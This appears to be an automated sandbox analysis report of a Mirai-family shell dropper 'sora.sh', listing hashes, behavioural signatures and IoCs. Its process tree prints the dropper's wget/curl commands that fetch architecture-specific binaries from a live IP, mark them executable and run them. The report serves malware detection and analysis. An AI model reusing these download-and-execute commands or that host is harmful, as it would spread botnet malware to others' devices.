Analysis
-
max time kernel
149s -
max time network
175s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
29-08-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
sora.sh
-
Size
1KB
-
MD5
4bad6b7a8f3a112f1e8a64415b2c5e57
-
SHA1
80386ebec3b511cd2a07da88e300a62590b8d889
-
SHA256
4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77
-
SHA512
da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Contacts a large (18459) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/robben 720 robben /tmp/robben 735 robben /tmp/robben 752 robben /tmp/robben 769 robben /tmp/robben 783 robben /tmp/robben 788 robben /tmp/robben 793 robben /tmp/robben 804 robben /tmp/robben 810 robben /tmp/robben 818 robben -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-2.dat upx behavioral2/files/fstream-3.dat upx behavioral2/files/fstream-5.dat upx -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads runtime system information 51 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/642/exe robben File opened for reading /proc/self/auxv curl File opened for reading /proc/842/exe robben File opened for reading /proc/self/exe robben File opened for reading /proc/836/exe robben File opened for reading /proc/838/exe robben File opened for reading /proc/self/exe robben File opened for reading /proc/585/exe robben File opened for reading /proc/596/exe robben File opened for reading /proc/832/exe robben File opened for reading /proc/846/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/834/exe robben File opened for reading /proc/794/exe robben File opened for reading /proc/725/exe robben File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/844/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/591/exe robben File opened for reading /proc/649/exe robben File opened for reading /proc/655/exe robben File opened for reading /proc/824/exe robben File opened for reading /proc/828/exe robben File opened for reading /proc/840/exe robben File opened for reading /proc/737/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/588/exe robben File opened for reading /proc/595/exe robben File opened for reading /proc/647/exe robben File opened for reading /proc/648/exe robben File opened for reading /proc/830/exe robben File opened for reading /proc/831/exe robben File opened for reading /proc/798/exe robben File opened for reading /proc/self/auxv curl File opened for reading /proc/650/exe robben File opened for reading /proc/812/exe robben File opened for reading /proc/826/exe robben -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/robben sora.sh File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.mips wget
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:650 -
/usr/bin/wgetwget http://154.216.17.67/bins/sora.x862⤵
- Writes file to tmp directory
PID:652
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:705
-
-
/bin/catcat sora.x862⤵PID:715
-
-
/bin/chmodchmod +x robben sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:717
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:720
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.mips2⤵
- Writes file to tmp directory
PID:722
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/catcat sora.mips2⤵PID:733
-
-
/bin/chmodchmod +x robben sora.mips sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:734
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:738
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/catcat sora.mpsl2⤵PID:749
-
-
/bin/chmodchmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:751
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:752
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm42⤵PID:754
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/catcat sora.arm42⤵PID:766
-
-
/bin/chmodchmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:768
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:769
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm52⤵
- Writes file to tmp directory
PID:771
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/catcat sora.arm52⤵PID:781
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:782
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:783
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm62⤵
- Writes file to tmp directory
PID:784
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/catcat sora.arm62⤵PID:786
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:787
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Reads runtime system information
PID:788
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm72⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/catcat sora.arm72⤵PID:791
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:792
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:793
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:797
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/catcat sora.ppc2⤵PID:802
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:803
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:804
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:806
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/catcat sora.m68k2⤵PID:808
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:809
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:810
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.sh42⤵
- Writes file to tmp directory
PID:812
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/catcat sora.sh42⤵PID:816
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 systemd-private-ec193ce4b3ba40d8b0efaaab9cb72539-systemd-timedated.service-0QGpJa2⤵PID:817
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:818
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5bcff8f405bdd93b8488e6f6aca117a32
SHA18b32a1dea70be2c76830e3808f70ad62eb3b1250
SHA25667180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396
SHA5125d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a
-
Filesize
31KB
MD5131fc41fbe66493277e3155f50b9fce5
SHA10bbb17cb882e34dc82e51862f8245f3187664beb
SHA256d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f
SHA512de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247
-
Filesize
33KB
MD58652e70ebc913d0078f59b2526a40d36
SHA11227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4
SHA256cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf
SHA512ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3
-
Filesize
212B
MD545e588171939a0780c48755918b1cd74
SHA16c33e64b1a43fb6752026fd1254cac740e7c3243
SHA256770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535
SHA512fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770
-
Filesize
27KB
MD500d6529558e66184baaf1b0f21e59739
SHA13b9db5227c48f501573ea9b626c5c765a17e7c61
SHA256fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d
SHA51249f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb
-
Filesize
71KB
MD5a0b83eba33da68f09402235338d316a8
SHA115f3e890997e3b7f21c16eb1b0462bdf4ed11d61
SHA256eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507
SHA5122346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79